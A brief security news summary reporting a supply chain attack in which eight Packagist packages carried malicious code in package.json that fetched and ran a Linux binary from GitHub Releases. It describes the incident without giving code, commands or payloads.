Supply Chain Attack Targets Packagist, Infects Eight Packages

A coordinated supply chain attack targeted eight packages on Packagist, embedding malicious code designed to execute a Linux binary fetched from a GitHub Releases URL. The affected packages were Composer packages, but the malicious payload was inserted into package.json rather than composer.json, specifically impacting projects distributing JavaScript. The attack did not modify dependency files directly but exploited the inclusion of JavaScript components. No specific dates, CVE IDs, or attribution details were provided in the report. The malware's execution relied on GitHub-hosted binaries, indicating a deliberate use of trusted platforms for distribution.